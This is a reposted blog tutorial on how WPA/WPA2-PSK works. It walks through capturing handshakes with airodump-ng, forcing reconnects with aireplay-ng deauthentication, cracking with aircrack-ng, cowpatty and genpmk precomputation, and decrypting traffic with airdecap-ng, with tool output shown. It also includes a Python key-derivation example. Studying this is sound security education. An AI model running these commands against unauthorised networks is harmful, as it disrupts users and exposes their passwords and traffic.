WPA/WPA2 Encryption Analysis


Published July 11, 2023 (author: )

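Overview

WPA mainly uses the Temporal Key Integrity Protocol (TKIP) encryption algorithm. TKIP was designed to improve on WEP without depending on entirely new hardware. WPA2 mandates the AES-CCMP algorithm for encryption, which is stronger and more robust than TKIP.

WPA and WPA2 support two authentication mechanisms:

1. EAP-based authentication (using a RADIUS server) -> enterprise
2. Pre-Shared Key (PSK) based authentication -> personal

Analysis of WPA encryption

WPA/WPA2 PSK is highly susceptible to dictionary attacks. The inputs this attack needs are the WPA four-way handshake between the wireless client and the AP and a dictionary of common passwords, which are then fed to a tool such as aircrack-ng.

How WPA/WPA2 PSK works: the PSK plus 5 parameters are used to generate the Pairwise Transient Key (PTK), and that key is then used to encrypt the channel between the wireless AP and the supplicant.

1. The network's SSID
2. The AP nonce, A-Nonce (Authenticator Nonce)
3. The supplicant nonce, S-Nonce (Supplicant Nonce)
4. The AP's MAC address
5. The supplicant's MAC address

All 5 parameters can be captured by sniffing the Wi-Fi channel during the session. The only value that cannot be obtained this way is the PSK.

PSK generation: the PSK is created from the user-supplied WPA-PSK passphrase plus the SSID. Both are passed through the Password-Based Key Derivation Function (PBKDF2), which outputs a 256-bit shared key.

Dictionary attack

The attacker uses an attack tool together with a large password dictionary. For each candidate password the tool derives a 256-bit PSK and combines it with the other parameters mentioned above to create a PTK. The PTK is then used to check whether it matches the Message Integrity Check (MIC) in one of the handshake packets. If it matches, the password guessed from the dictionary is correct; if it does not match, the guess is wrong.

[Flowchart: start -> passphrase (8-63 characters) -> PBKDF2 (SSID) -> 256-bit pre-shared key (PSK) -> combined with supplicant nonce, AP nonce, AP MAC address, supplicant MAC address -> verify MIC? (yes / no) -> passphrase verified]

Cracking WPA-PSK

The same procedure applies to WPA2 networks.

    airodump-ng wlan0mon
    airodump-ng --bssid ap_mac -c channel -w ~/capture/ssid wlan0mon
    # Deauth packets; add --ignore-negative-one if the command output contains channel-related errors
    aireplay-ng -0 10 -a ap_mac -c computer_mac wlan0mon --ignore-negative-one
    aircrack-ng ~/capture/ssid*.cap -w /usr/share/wordlists/
    cowpatty -f /usr/share/wordlists/ -r capture/fast_ -s FAST_966E

wireshark

Open the .cap capture produced by airodump-ng in Wireshark and use a filter expression to select and inspect the packets belonging to the WPA four-way handshake. WPA handshake packets belong to the EAPOL protocol.

Kali's built-in password dictionaries

cowpatty

    cowpatty 4.8 - WPA-PSK dictionary attack.
    cowpatty: Must supply a pcap file with -r

    Usage: cowpatty [options]

        -f    Dictionary file
        -d    Hash file (genpmk)
        -r    Packet capture file
        -s    Network SSID (enclose in quotes if SSID includes spaces)
        -c    Check for valid 4-way frames, does not crack
        -h    Print this help information and exit
        -v    Print verbose information (more -v for more verbosity)
        -V    Print program version and exit

    root@yue:~# cowpatty -f /usr/share/wordlists/ -r capture/fast_ -s FAST_966E
    cowpatty 4.8 - WPA-PSK dictionary attack.
    Collected all necessary data to mount crack against WPA2/PSK ng dictionary attack.
    Please be PSK is "186****1111".
    1 passphrases tested in 0.01 seconds: 143.37 passphrases/second

Speeding up WPA/WPA2 PSK cracking

Computing the PSK from the passphrase and the SSID with PBKDF2 is both extremely CPU-intensive and time-consuming. Before it outputs the 256-bit PSK, the function mixes the two together more than 4096 times. The next cracking step uses this passphrase together with the parameters from the four-way handshake and verifies the result against the MIC in the handshake. The parameters differ with every handshake.

The key point: compute the PSK from the passphrase as quickly as possible. Precomputing the PSK (also called the Pairwise Master Key, PMK) speeds up the cracking process.

Speeding it up

1. Use the genpmk tool to precompute the PMKs for a specific SSID and wordlist.

    root@yue:~/Pictures# genpmk
    genpmk 1.3 - WPA-PSK precomputation attack.
    genpmk: Must specify a dictionary file with -f

    Usage: genpmk [options]

        -f    Dictionary file
        -d    Output hash file
        -s    Network SSID
        -h    Print this help information and exit
        -v    Print verbose information (more -v for more verbosity)
        -V    Print program version and exit

    After precomputing the hash file, run cowpatty with the -d argument.

    # genpmk -f -d output_ -s ap_ssid

This generates the output_ file.

2. Use cowpatty to crack.

    # cowpatty -d out_ -s ap_ssid -r ~/capture/ap_ssid*.cap

Decrypting WPA packets

    root@yue:~/Pictures# airdecap-ng --help

      Airdecap-ng 1.5.2 - (C) 2006-2018 Thomas d'Otreppe

      usage: airdecap-ng [options]

      Common options:
          -l : don't remove the 802.11 header
          -b : access point MAC address filter
          -e : target network SSID
          -o : output file for decrypted packets (default -dec)

      WEP specific option:
          -w : target network WEP key in hex
          -c : output file for corrupted WEP packets (default -bad)

      WPA specific options:
          -p : target network WPA passphrase
          -k : WPA Pairwise Master Key in hex

          --help : Displays this usage screen

    root@yue:~/Pictures# airdecap-ng -p 186****1111 -e FAST_966E ~/capture/fast_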

    Total number of stations seen            4
    Total number of packets read         11843
    Total number of WEP data packets         0
    Total number of WPA data packets       906
    Number of plaintext data packets         0
    Number of decrypted WEP packets          0
    Number of corrupted WEP packets          0
    Number of decrypted WPA packets        376
    Number of bad TKIP (WPA) packets         0

The file generated after decryption is:

    -rw-r--r-- 1 root root 25250 Jan 4 20:44 fast_

Notes:

1. TKIP: Temporal Key Integrity Protocol
2. The combination of both of these is sent through the Password-Based Key Derivation Function, which outputs the 256-bit shared key.
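The key derivation described in the PSK generation and dictionary attack sections, written out as an added Python example (not code from the original article or from any of the tools it mentions). The function names, MAC addresses, nonces and EAPOL frame bytes are constructed for illustration; the passphrase "password" and SSID "IEEE" are the IEEE 802.11i test-vector inputs.

```python
import hashlib
import hmac

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8-63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: HMAC-SHA1 keyed with the PMK over both MACs and both nonces."""
    # min/max ordering means AP and supplicant build the identical input.
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                       hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]  # KCK | KEK | TK | MIC keys

def eapol_mic(ptk: bytes, frame_with_zeroed_mic: bytes) -> bytes:
    """WPA2 handshake MIC: HMAC-SHA1 keyed with KCK (PTK[0:16]), first 16 bytes."""
    return hmac.new(ptk[:16], frame_with_zeroed_mic, hashlib.sha1).digest()[:16]

def ap_accepts(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, frame, mic) -> bool:
    """The check the AP runs on handshake message 2: recompute the MIC and compare."""
    ptk = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return hmac.compare_digest(eapol_mic(ptk, frame), mic)

# Constructed sample values (not from a real capture).
AP_MAC = bytes.fromhex("020000000001")
STA_MAC = bytes.fromhex("020000000002")
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
FRAME = b"\x01\x03\x00\x75" + b"\x00" * 117  # placeholder EAPOL-Key bytes, MIC zeroed

if __name__ == "__main__":
    pmk = derive_pmk("password", "IEEE")
    print("PMK(password, IEEE)  :", pmk.hex())
    # Same passphrase, different SSID: a different PMK, so a precomputed table is per-SSID.
    print("PMK(password, IEEE-2):", derive_pmk("password", "IEEE-2").hex())
    mic = eapol_mic(derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE), FRAME)
    args = (AP_MAC, STA_MAC, ANONCE, SNONCE, FRAME, mic)
    print("right passphrase accepted:", ap_accepts("password", "IEEE", *args))
    print("wrong passphrase accepted:", ap_accepts("passw0rd", "IEEE", *args))
```

Because the SSID is the only salt in the PMK derivation, a precomputed hash file is valid for one SSID only, and nothing captured on the air changes the per-guess cost of PBKDF2. The strength of a PSK network therefore rests on the passphrase itself.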

Posted by admin. When reposting, please credit the source: http://www.yc00.com/web/1689072354a203120.html
